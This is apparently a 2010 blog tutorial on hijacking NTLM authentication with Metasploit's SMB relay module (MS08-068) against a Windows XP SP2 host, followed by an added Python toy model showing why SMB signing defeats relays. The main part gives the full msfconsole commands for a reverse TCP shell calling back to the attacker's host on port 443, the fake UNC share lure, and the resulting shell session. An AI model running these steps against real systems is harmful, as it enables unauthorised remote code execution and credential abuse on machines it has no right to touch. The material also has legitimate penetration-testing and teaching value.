Tuesday, September 28, 2010

Tutorial: NTLM Authentication Hijack with SMB Relay

Local Host: 192.168.1.252 (BackTrack 4 with Metasploit 3.x)
Target Host: 192.168.1.50 (Windows XP SP2 English)

Step 1: Prepare the SMB Exploit on Local Host

The windows/smb/smb_relay module (MS08-068 Microsoft Windows SMB Relay Code Execution) runs a fake SMB server on SRVHOST. When a client connects and authenticates with NTLM, the module does not check the credentials itself: it opens an SMB session to SMBHOST, hands the client the challenge it received from there, and forwards the client's answer back. SMBHOST is left unset here, so the authentication is reflected to the originating system, which works on an XP SP2 box that has not had the MS08-068 update applied.

cd /pentest/exploits/msf3
./msfconsole

msf > use windows/smb/smb_relay

msf exploit(smb_relay) > set PAYLOAD windows/shell/reverse_tcp
msf exploit(smb_relay) > set SRVHOST 192.168.1.252
msf exploit(smb_relay) > set LHOST 192.168.1.252
msf exploit(smb_relay) > set LPORT 443
msf exploit(smb_relay) > exploit

Step 2: Connect to the FAKE shared folder from the target machine

\\192.168.1.252\shared\xxx.jpg

Neither the share nor the file exists: shared\xxx.jpg is a fake link. Any UNC reference to the attacker's host (typed into Explorer or the Run dialog, or embedded as an image link that the victim's browser resolves) is enough, because Windows answers the SMB server's NTLM challenge automatically with the logged-on user's credentials. For the relayed session to yield a shell, that user must be a local administrator on the target and the target must not require SMB signing.

Step 3: Interact with the open session

Wait until the target machine connects to the fake share. Once it has, the module relays the authentication, creates the service that runs the payload, and the reverse shell calls back to port 443. Give it a moment, then press Enter to get the prompt back.

Check the active sessions
msf > sessions -l

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 shell 192.168.1.252:443 -> 192.168.1.50:1118

Interact with active session# 1
msf > sessions -i 1

[*] Starting interaction with 1...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>
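As an added example that is not part of the original post or of the Metasploit module, the following Python model reduces Steps 1 to 3 to the NTLMv2 arithmetic: the victim answers a challenge the attacker merely forwarded, the target accepts it, and the attacker never sees the NT hash. It also shows why requiring SMB signing stops the relay: the session key is derived from the NTLMv2 hash, so the relay cannot sign the commands it wants to send. The NT hash, server challenge, client blob, host names and the shortened MD5-based signature are constructed for illustration; the real NTLMSSP and SMB wire formats are not reproduced.

```python
# Added example (not from the original post): toy model of the relay that
# windows/smb/smb_relay performs, reduced to NTLMv2 arithmetic.
import hashlib
import hmac

# Constructed values: the victim's NT hash (MD4 of the password in reality) and
# the target's server challenge (8 random bytes in reality).
NT_HASH = bytes.fromhex("8846f7eaee8fb117ad06bdd830b7586c")
SERVER_CHALLENGE = bytes.fromhex("0123456789abcdef")
CLIENT_BLOB = b"\x01\x01" + b"\x00" * 6 + b"constructed-timestamp-and-nonce"


def ntlmv2_hash(nt_hash, user, domain):
    """NTOWFv2: HMAC-MD5 keyed with the NT hash over UPPER(user)+domain in UTF-16LE."""
    return hmac.new(nt_hash, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def nt_proof(v2_hash, server_challenge, blob):
    """NTProofStr: HMAC-MD5(NTOWFv2, ServerChallenge || client blob)."""
    return hmac.new(v2_hash, server_challenge + blob, hashlib.md5).digest()


def session_key(v2_hash, proof):
    """Key-exchange key for NTLMv2 without KEY_EXCH: HMAC-MD5(NTOWFv2, NTProofStr)."""
    return hmac.new(v2_hash, proof, hashlib.md5).digest()


def sign(key, message):
    """Simplified signature (8 bytes). Real SMB1 signing uses MD5, SMB2 HMAC-SHA256."""
    return hmac.new(key, message, hashlib.md5).digest()[:8]


class Victim:
    """The XP box: holds the user's NT hash and answers whatever challenge it is handed."""

    def __init__(self, domain, user, nt_hash):
        self.domain, self.user = domain, user
        self.v2_hash = ntlmv2_hash(nt_hash, user, domain)

    def authenticate(self, server_challenge):
        proof = nt_proof(self.v2_hash, server_challenge, CLIENT_BLOB)
        # Type 3 message: identity plus NTProofStr||blob. No hash leaves the host.
        return {"domain": self.domain, "user": self.user, "nt_response": proof + CLIENT_BLOB}


class Target:
    """The host the relay authenticates to; with SMBHOST unset it is the victim itself."""

    def __init__(self, sam, require_signing):
        self.sam, self.require_signing, self.key = sam, require_signing, None

    def new_challenge(self):
        return SERVER_CHALLENGE

    def verify(self, type3):
        nt_hash = self.sam.get((type3["domain"], type3["user"]))
        if nt_hash is None:
            return False
        v2_hash = ntlmv2_hash(nt_hash, type3["user"], type3["domain"])
        proof, blob = type3["nt_response"][:16], type3["nt_response"][16:]
        if not hmac.compare_digest(proof, nt_proof(v2_hash, SERVER_CHALLENGE, blob)):
            return False
        self.key = session_key(v2_hash, proof)  # derivable only with the NT hash
        return True

    def accept(self, message, signature):
        """Accept a post-authentication request, checking its signature if required."""
        if self.key is None:
            return False
        if not self.require_signing:
            return True
        return signature is not None and hmac.compare_digest(signature, sign(self.key, message))


def run_relay(require_signing):
    victim = Victim("WORKGROUP", "Administrator", NT_HASH)
    target = Target({("WORKGROUP", "Administrator"): NT_HASH}, require_signing)
    # The victim opens \\attacker\shared\xxx.jpg. The fake server does not generate its
    # own challenge: it starts a session with the target, forwards the target's challenge
    # to the victim, then forwards the victim's answer to the target.
    type3 = victim.authenticate(target.new_challenge())
    authenticated = target.verify(type3)
    # The attacker now rides the authenticated session (smb_relay creates a service that
    # runs the payload). Without the NT hash it cannot derive the session key, so the
    # best it can offer is a guessed signature.
    command = b"svcctl: CreateService payload.exe"
    accepted = target.accept(command, sign(b"\x00" * 16, command))
    return {"authenticated": authenticated, "command_accepted": accepted}


if __name__ == "__main__":
    for signing in (False, True):
        print("require_signing=%s -> %s" % (signing, run_relay(signing)))
```

Running it shows both cases: without signing the relayed session accepts the command (the situation on the XP SP2 target above); with signing required the authentication still succeeds but the command is rejected, which is why enforcing SMB signing, not just patching MS08-068 reflection, is the mitigation against relays to other hosts.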

1 comment:

  1. Your information to the student about the window designing option is very interesting for the student.
    Thanks....
    regards, saad from
    Education